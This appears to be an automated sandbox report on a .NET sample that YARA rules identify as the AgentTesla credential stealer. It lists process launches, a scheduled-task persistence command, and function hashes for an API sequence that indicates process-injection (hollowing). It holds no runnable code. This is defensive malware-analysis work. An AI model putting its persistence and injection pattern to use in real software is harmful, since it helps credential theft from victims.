MD5 hash:	4A8EB2631D91AD206D94D22179C54C0E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2147145262.0000000002171000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2147750440.0000000003179000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2147168383.0000000002191000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 23%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 2716 Parent PID: 260

General

Start time:	06:39:07
Start date:	08/02/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\hEeIyOK' /XML 'C:\Users\user\AppData\Local\Temp\tmp8650.tmp'
Imagebase:	0xe30000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: RegAsmbvbvcrtyjgh.exe PID: 1696 Parent PID: 260

General

Start time:	06:39:08
Start date:	08/02/2021
Path:	C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe
Imagebase:	0xa50000
File size:	1377280 bytes
MD5 hash:	4A8EB2631D91AD206D94D22179C54C0E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2404754353.0000000002856000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2404754353.0000000002856000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2404435302.00000000024EC000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2404435302.00000000024EC000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2403848274.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2404353388.0000000002421000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2404353388.0000000002421000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: RegAsmbvbvcrtyjgh.exe PID: 260 Parent PID: 1692 RegAsmbvbvcrtyjgh.exeCOMMON

Executed Functions

Function 00270354, Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

tEm, xrefs: 002710AA

Memory Dump Source

Source File: 00000004.00000002.2146678694.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false

Similarity

API ID:
String ID: tEm
API String ID: 0-3333056351
Opcode ID: bde3efe730d6eb62fbf805c389b34ae5588e46fbefe4516c4abde60f34d804f5
Instruction ID: 283673e388f7ec4057dfc29849c00ce53c9048c4cb3ba253086ca67d396b751e
Opcode Fuzzy Hash: bde3efe730d6eb62fbf805c389b34ae5588e46fbefe4516c4abde60f34d804f5
Instruction Fuzzy Hash: 0AD10070D25228CFEB14DFA9C844BEDBBB6AF89304F10C0A9D50DAB251C7745AA5CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00272A90, Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2146678694.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 487c9ef70a2296c79ca49b6d6ecc0510c69dbd44a8a07402bc7781d1440d74f5
Instruction ID: db0aba86565bc85287f61c5baea682072e03eb2c845329e90fb2547bc02494bd
Opcode Fuzzy Hash: 487c9ef70a2296c79ca49b6d6ecc0510c69dbd44a8a07402bc7781d1440d74f5
Instruction Fuzzy Hash: 66911770E10219CFDB14DFA9C840BDDBBB6BF99319F54C4A9D60CAB204DB705A998F50

Uniqueness

Uniqueness Score: -1.00%

Function 0027A230, Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2146678694.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db5047c621a0f6bae5bf30feb7a6abeb26f6fc4b46009ad142c3f59437801d83
Instruction ID: 167bdd99d3fd3db6fdbc33899bd4676454bf8630cac2796c2a62c6b48a56a085
Opcode Fuzzy Hash: db5047c621a0f6bae5bf30feb7a6abeb26f6fc4b46009ad142c3f59437801d83
Instruction Fuzzy Hash: A59131B4E11208CFCB04CFE9C484AEEBBF6AF88325F64C069D518AB344D7709981CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00272A81, Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2146678694.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05c98f1552f4d0ebe762b6d3efb5c6596d843a97e45e5293114385af139bddfc
Instruction ID: 3f2dda24248d90f13556bf082012a2a032e685e830be8d287de3f44b27c0abaf
Opcode Fuzzy Hash: 05c98f1552f4d0ebe762b6d3efb5c6596d843a97e45e5293114385af139bddfc
Instruction Fuzzy Hash: 7C611670E10219CFDB14DFAAC840BDEBBF6AF98315F54C4A9D60CA7244EB305A998F51

Uniqueness

Uniqueness Score: -1.00%

Function 0027B368, Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0027B62F

Memory Dump Source

Source File: 00000004.00000002.2146678694.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 4caf468437de9fe7e4df8cee6d7e2d549497b51ec897964cabd180aeaecbab0d
Instruction ID: 738b6f4b2e10e176c49ed7bb8768cd38d49dc304dabe024e706452e0d3817271
Opcode Fuzzy Hash: 4caf468437de9fe7e4df8cee6d7e2d549497b51ec897964cabd180aeaecbab0d
Instruction Fuzzy Hash: DAC14571D1022A8FCF25CFA4C851BEEBBB2BF49304F1095A9D909B7240DB749A95CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0027AFD0, Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0027B0A3

Memory Dump Source

Source File: 00000004.00000002.2146678694.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: f82647a6d4990438893f9d9d3e82ce5615504a0b0d58739d68c9488969ad9f14
Instruction ID: 05435c78de928b467b4eb704367d428c0e6e5ee5d2e6dc9426a1e6ea3d4abbce
Opcode Fuzzy Hash: f82647a6d4990438893f9d9d3e82ce5615504a0b0d58739d68c9488969ad9f14
Instruction Fuzzy Hash: 7A41A8B4D012589FCF00CFA9D984AEEFBF1BF49304F20942AE819B7200D775AA55CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0027B130, Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0027B1E2

Memory Dump Source

Source File: 00000004.00000002.2146678694.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 1644d04776da15b635275bef96c4fa1afaa319f006302edb11158317226d96d1
Instruction ID: ae3b70dbc750bbe143290ce7d96ff485b57cd05947446ea7cc266636d128b18e
Opcode Fuzzy Hash: 1644d04776da15b635275bef96c4fa1afaa319f006302edb11158317226d96d1
Instruction Fuzzy Hash: E14198B5D00258DFCF10CFA9D884AEEFBB5BB49310F10942AE815B7200D775A956CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0027AEA8, Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0027AF52

Memory Dump Source

Source File: 00000004.00000002.2146678694.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b34436742afa4f8b39a13016763c762f4576469ec57dd4c26f3bcd4355e9099e
Instruction ID: 9ae2c97f078dc739c4b88734fd6e0f4d86aac936c347e525178f686986e3f15b
Opcode Fuzzy Hash: b34436742afa4f8b39a13016763c762f4576469ec57dd4c26f3bcd4355e9099e
Instruction Fuzzy Hash: AF4188B8D00258DBCF10CFA9D884ADEFBB5BB49310F20942AE815B7310D775A916CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0027AD78, Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0027AE27

Memory Dump Source

Source File: 00000004.00000002.2146678694.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: b32543d8e1ad766ce215fd4ed581a82d9b8c532ab7fcae1bb62ba90ad21b8d61
Instruction ID: 95c6c5f5206df7cd8a9d57878e65df47581db85a187170ee17e91a6729b91faf
Opcode Fuzzy Hash: b32543d8e1ad766ce215fd4ed581a82d9b8c532ab7fcae1bb62ba90ad21b8d61
Instruction Fuzzy Hash: 8341BAB4D00218DFCB10CFA9D884AEEFBB5BB49314F24842AE819B7240D738AA45CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0027AC88, Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0027AD06

Memory Dump Source

Source File: 00000004.00000002.2146678694.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f4aac3e31a655f1d0560163e80797c1cebcbc6331a8c474394f70147636f94c4
Instruction ID: 732d9c4c5d05012ae604f4d663b41e8d6bc1fc09bfb419ea7bdd71d2ca81cdfc
Opcode Fuzzy Hash: f4aac3e31a655f1d0560163e80797c1cebcbc6331a8c474394f70147636f94c4
Instruction Fuzzy Hash: 07319AB4D112189FCF14CFA9D884ADEFBB5EB49314F24982AE819B7300D775A901CF95

Uniqueness

Uniqueness Score: -1.00%

Function 001CD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2146648944.00000000001CD000.00000040.00000001.sdmp, Offset: 001CD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd9cf3096b6b5b690d70ddca7433205b02a2fcb4de56d10707355aae7a7c349b
Instruction ID: 9f7f7364c6662e34eaa1b225938ea2a00ba29d92c2ba432bde32506ab6ef9948
Opcode Fuzzy Hash: cd9cf3096b6b5b690d70ddca7433205b02a2fcb4de56d10707355aae7a7c349b
Instruction Fuzzy Hash: EC21D375604244DFCB14CF28E584F16BBA5EB94314F24C9BDE8094B246C336D867CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 001CD006, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2146648944.00000000001CD000.00000040.00000001.sdmp, Offset: 001CD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41e87487fbca2f8cba46e46e0549650a591e1d537a18e43563e37a8eb41ae3fc
Instruction ID: a2648786d737ba04a7f5c289c2602ec26f95fbdc6a3ef57a2fe500f51e285714
Opcode Fuzzy Hash: 41e87487fbca2f8cba46e46e0549650a591e1d537a18e43563e37a8eb41ae3fc
Instruction Fuzzy Hash: B32192755083809FCB02CF14E994B15BF71EB56314F28C5EAD8498F257C33AD816CB62

Uniqueness

Uniqueness Score: -1.00%

Function 001BD1C5, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2146641549.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29f637baf671aeeb135196d500372d2b6d0247c6d74a4d4641575c00cd8b9d94
Instruction ID: a4458313c9f7ce089a0d3373fe5ee32872d016283e34125df534d9627e53bed7
Opcode Fuzzy Hash: 29f637baf671aeeb135196d500372d2b6d0247c6d74a4d4641575c00cd8b9d94
Instruction Fuzzy Hash: 9601F731004384DBE7284B55E884BE7BFDCEF41724F14C49AED081A282D334D841C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 001BD1C4, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2146641549.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19781dc071d7b0d9568d425b50d0b4a18be57d22cc8f16f7893796fe256a19c8
Instruction ID: a8a058d311d279b7bebb114b43975a7cf2ef2db45a1f9971db9ecdec1e2c481d
Opcode Fuzzy Hash: 19781dc071d7b0d9568d425b50d0b4a18be57d22cc8f16f7893796fe256a19c8
Instruction Fuzzy Hash: A7F0A431404684AEE7148A05D888B62FF98EB51734F14C45AED481A246D3749840CBA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00274110, Relevance: 1.4, Strings: 1, Instructions: 147COMMON

Download Yara Rule

Strings

@2Em, xrefs: 0027431D

Memory Dump Source

Source File: 00000004.00000002.2146678694.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false

Similarity

API ID:
String ID: @2Em
API String ID: 0-598872186
Opcode ID: 082671c19e9b80d0a10fd5f92721375c4242bae4b3b0ba5c5b2fc6845940ab47
Instruction ID: 765941dfcb75744b29039d46b3978fe0d027c1d882241ee9e8878a85b4deec75
Opcode Fuzzy Hash: 082671c19e9b80d0a10fd5f92721375c4242bae4b3b0ba5c5b2fc6845940ab47
Instruction Fuzzy Hash: B9514C7091020C8FDB49EFB9D940A9EBFB7AF88308F04C939D0059B764DB7499958B96

Uniqueness

Uniqueness Score: -1.00%

Function 00274120, Relevance: 1.4, Strings: 1, Instructions: 144COMMON

Download Yara Rule

Strings

@2Em, xrefs: 0027431D

Memory Dump Source

Source File: 00000004.00000002.2146678694.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false

Similarity

API ID:
String ID: @2Em
API String ID: 0-598872186
Opcode ID: 3bb2b3e17a1874816c41b24e3ee6dc5f3987db359443547c1ecf87ba2b130fa4
Instruction ID: 95dd8ff0b5968906ac6d6cdef9f23d3b3edb2b5aa44bc0434841ca4c0136c229
Opcode Fuzzy Hash: 3bb2b3e17a1874816c41b24e3ee6dc5f3987db359443547c1ecf87ba2b130fa4
Instruction Fuzzy Hash: 61514A7091020C8FDB49EFB9D940A9EBFB7AF88308F04C939D0059B764DF7499858B96

Uniqueness

Uniqueness Score: -1.00%

Function 00274370, Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2146678694.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4d6e16d7b2030cfa1289863687add673f3a092859ebea272c2fd2ada7005a75
Instruction ID: a7fc5d54cd224bd6e6dbff1597369a08fa89b8089804ecfc343bb5d2b93e8355
Opcode Fuzzy Hash: d4d6e16d7b2030cfa1289863687add673f3a092859ebea272c2fd2ada7005a75
Instruction Fuzzy Hash: EF4124B1E156588BEB5CCF6B8C4468EFAF7BFC8204F14C1BA851DAB225DB7005859F14

Uniqueness

Uniqueness Score: -1.00%

Function 00270FB0, Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2146678694.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e21c57fa4540cfb2529ebe5831bedad6b4d5fc7d52422a9351f33ab84f3e7aa
Instruction ID: 14e450a146f4a450d7aaf31e2dde8f193704b64ae440576e00ddbee12f87d236
Opcode Fuzzy Hash: 1e21c57fa4540cfb2529ebe5831bedad6b4d5fc7d52422a9351f33ab84f3e7aa
Instruction Fuzzy Hash: AA41C471D11259CBEB18CFAAC8447EEFBF6AF89304F14C1AAC418AB294D7741A95CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0027D800, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2146678694.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68e96a49c23ad06c0347d5aaca64dc5a054797d5fd0ef03056abce5f7a8bf08f
Instruction ID: 3c3a3774855c4b180e3077420f245905859d7e11a15cc0066ebe939080183ca2
Opcode Fuzzy Hash: 68e96a49c23ad06c0347d5aaca64dc5a054797d5fd0ef03056abce5f7a8bf08f
Instruction Fuzzy Hash: 21118B30D152598FDB14CFA9C858BFEBBF1AF4E300F14906AD419B3290CB788984DB69

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsmbvbvcrtyjgh.exe PID: 1696 Parent PID: 260 RegAsmbvbvcrtyjgh.exeCOMMON

Executed Functions

Function 002E94AE, Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 670COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E94F3
KiUserExceptionDispatcher.NTDLL ref: 002E999E

Strings

,, xrefs: 002EA74F

Memory Dump Source

Source File: 00000007.00000002.2403787352.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: ,
API String ID: 6842923-4120420056
Opcode ID: cbe0ae73cadb2f94f5a613f1644fdc6f5e0f4ad469c43568fa27360f38cc47f6
Instruction ID: 68bf97d6d3ba50fc56e2b7d06a0c1b0790b37b852a319ef163821de613502126
Opcode Fuzzy Hash: cbe0ae73cadb2f94f5a613f1644fdc6f5e0f4ad469c43568fa27360f38cc47f6
Instruction Fuzzy Hash: 3A626674A54269CFCB24EF20C98879CB7BABF88305F6084EAD509A7351DB749E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 002E94CF, Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 588COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E94F3
KiUserExceptionDispatcher.NTDLL ref: 002E999E

Strings

,, xrefs: 002EA74F

Memory Dump Source

Source File: 00000007.00000002.2403787352.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: ,
API String ID: 6842923-4120420056
Opcode ID: 03ce8546b1fa03737871d3056b02341822c81299c7f4d3e349620e2344fa4273
Instruction ID: 0fd2612958affcb36713cc16469813ab109735036945d1832c315ea3cd64809b
Opcode Fuzzy Hash: 03ce8546b1fa03737871d3056b02341822c81299c7f4d3e349620e2344fa4273
Instruction Fuzzy Hash: 81524474A14269CFCB24DF20C98879DB7BABF88305F6084EAD50AA7351DB749E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 002E952A, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 577COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E999E

Strings

,, xrefs: 002EA74F

Memory Dump Source

Source File: 00000007.00000002.2403787352.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: ,
API String ID: 6842923-4120420056
Opcode ID: fc795be1803f052bca0df70a746e57ef9167645101b2158f3db271d4e50c578e
Instruction ID: c829851e90f6afc0af1970db026b933c5f6341408669b58cc67025fb8eed90e1
Opcode Fuzzy Hash: fc795be1803f052bca0df70a746e57ef9167645101b2158f3db271d4e50c578e
Instruction Fuzzy Hash: C3423574A14269CFCB24DF20C98879DB7BABF88305F6084EAD50AA7351DB749E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 002E956F, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 570COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E999E

Strings

,, xrefs: 002EA74F

Memory Dump Source

Source File: 00000007.00000002.2403787352.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: ,
API String ID: 6842923-4120420056
Opcode ID: e896ef512bc4b6b623897dd606c3c848fa8646f5ca9e96e073bd9d8d62e6edca
Instruction ID: d0b4a6d268e76f8ecdb2452cdb53d93a17eeeabe76515c465ab2a0723d264d66
Opcode Fuzzy Hash: e896ef512bc4b6b623897dd606c3c848fa8646f5ca9e96e073bd9d8d62e6edca
Instruction Fuzzy Hash: 22424474A14269CFCB24DF20C98879DB7BABF88305F6084EAD50AA7351DB749E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 002E95B4, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 563COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E999E

Strings

,, xrefs: 002EA74F

Memory Dump Source

Source File: 00000007.00000002.2403787352.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: ,
API String ID: 6842923-4120420056
Opcode ID: ccba97f359afca04f7dadb9a8a757355956b353821d35bd61fa3c196cb6cc9df
Instruction ID: 2fd9faff543a7ba4e5bf371760a1027415903060b328b5f2ac1a654821a875e1
Opcode Fuzzy Hash: ccba97f359afca04f7dadb9a8a757355956b353821d35bd61fa3c196cb6cc9df
Instruction Fuzzy Hash: F4424474A14269CFCB24DF20C98879DB7BABF88305F6084EAD50AA7351DB749E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 002E95F9, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 556COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E999E

Strings

,, xrefs: 002EA74F

Memory Dump Source

Source File: 00000007.00000002.2403787352.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: ,
API String ID: 6842923-4120420056
Opcode ID: aae7007c83cd18803b1c40d23168ca05cb591ae28539f75ed07c8f22bf347ced
Instruction ID: db86e91af5b7b4d6937b6a0d1c8aeffc38f72d522487d3379e05fe6a0742a9f4
Opcode Fuzzy Hash: aae7007c83cd18803b1c40d23168ca05cb591ae28539f75ed07c8f22bf347ced
Instruction Fuzzy Hash: 6C424474A14269CFCB24DF20C98879CB7BABF88305F6084EAD50AA7351DB749E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 002E963E, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 549COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E999E

Strings

,, xrefs: 002EA74F

Memory Dump Source

Source File: 00000007.00000002.2403787352.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: ,
API String ID: 6842923-4120420056
Opcode ID: f56b15fa45bde6bf6b6dbb74f76c12297ff774c51ad2e32f1b0a56d93b8777c3
Instruction ID: a39d4544603140df99dcd03d464339fde193f8211eacaa94f57039544b49a25b
Opcode Fuzzy Hash: f56b15fa45bde6bf6b6dbb74f76c12297ff774c51ad2e32f1b0a56d93b8777c3
Instruction Fuzzy Hash: D7424574A14269CFCB24EF20C98879DB7BABF88305F6084E9D50AA7351DB749E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 002E9683, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 542COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E999E

Strings

,, xrefs: 002EA74F

Memory Dump Source

Source File: 00000007.00000002.2403787352.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: ,
API String ID: 6842923-4120420056
Opcode ID: 47acb3f38bb7c7a326ab8f96db838236fdcc011d3bf76e5e770160d994fbd263
Instruction ID: 2ccd781e617b4eaa40afe54f3f8ba8d42b387cbfbe815a16f182c3e3e39a1ac0
Opcode Fuzzy Hash: 47acb3f38bb7c7a326ab8f96db838236fdcc011d3bf76e5e770160d994fbd263
Instruction Fuzzy Hash: A3424474A14269CFCB24EF20C98879DB7BABF88305F6084E9D50AA7351DB749E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 002E96C8, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 535COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E999E

Strings

,, xrefs: 002EA74F

Memory Dump Source

Source File: 00000007.00000002.2403787352.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: ,
API String ID: 6842923-4120420056
Opcode ID: 1198bf663e0edbfc8969203590e7d9bda267988812bafc9e8fb33b88e73e381f
Instruction ID: dad075728a8ad58535b415660c1494921db9bcff76c394808833a24aecbd37c2
Opcode Fuzzy Hash: 1198bf663e0edbfc8969203590e7d9bda267988812bafc9e8fb33b88e73e381f
Instruction Fuzzy Hash: CA324474A14269CFCB24EF20C98879DB7BABF88305F6084E9D50AA7351DB749E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 002E970D, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 528COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E999E

Strings

,, xrefs: 002EA74F

Memory Dump Source

Source File: 00000007.00000002.2403787352.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: ,
API String ID: 6842923-4120420056
Opcode ID: 56b4607e592e7d198452554e1dd5f6e8976144c43ac32b2a71f95a04f53ef51b
Instruction ID: c1dcd50d31e0830c18307762e5081871b0370b86676c4660a3984fe1d10fe02c
Opcode Fuzzy Hash: 56b4607e592e7d198452554e1dd5f6e8976144c43ac32b2a71f95a04f53ef51b
Instruction Fuzzy Hash: E7324474A14269CFCB24EF20C98879CB7BABF88305F6085E9D50AA7351DB749E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 002E9752, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 521COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E999E

Strings

,, xrefs: 002EA74F

Memory Dump Source

Source File: 00000007.00000002.2403787352.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: ,
API String ID: 6842923-4120420056
Opcode ID: 3391c778bf1dce29785ccd83abb2378ff524f018a40430a3c9eba73fb6c4d6aa
Instruction ID: 3be40d47d531696490a3784f07a1e76076cca3aa102fcf2b9bf678b47a272ea3
Opcode Fuzzy Hash: 3391c778bf1dce29785ccd83abb2378ff524f018a40430a3c9eba73fb6c4d6aa
Instruction Fuzzy Hash: 6A324474A14269CFCB24EF20C98879DB7BABF88305F6084E9D50AA7351DB749E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 002E9797, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 514COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E999E

Strings

,, xrefs: 002EA74F

Memory Dump Source

Source File: 00000007.00000002.2403787352.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: ,
API String ID: 6842923-4120420056
Opcode ID: b340c41626506cdbd98a8f6fad60242860ad64ffa66e77db6aa6339f2c74c229
Instruction ID: 496a5fa107bfbd0a1839dc7fad5960077715a68131e2c729e4105edcc5308649
Opcode Fuzzy Hash: b340c41626506cdbd98a8f6fad60242860ad64ffa66e77db6aa6339f2c74c229
Instruction Fuzzy Hash: EA325374A14269CFCB24EF20C98879DB7BABF88305F6084E9D50AA7351DB749E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 002E97DC, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 507COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E999E

Strings

,, xrefs: 002EA74F

Memory Dump Source

Source File: 00000007.00000002.2403787352.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: ,
API String ID: 6842923-4120420056
Opcode ID: 819138ff7df149f987cf8d9cf6ac317fd49a9eaff2845b00143142627c168184
Instruction ID: 230d60a2422aa4698790091f68ca5da7170fb1e21f0bb4f06fb3177399edf901
Opcode Fuzzy Hash: 819138ff7df149f987cf8d9cf6ac317fd49a9eaff2845b00143142627c168184
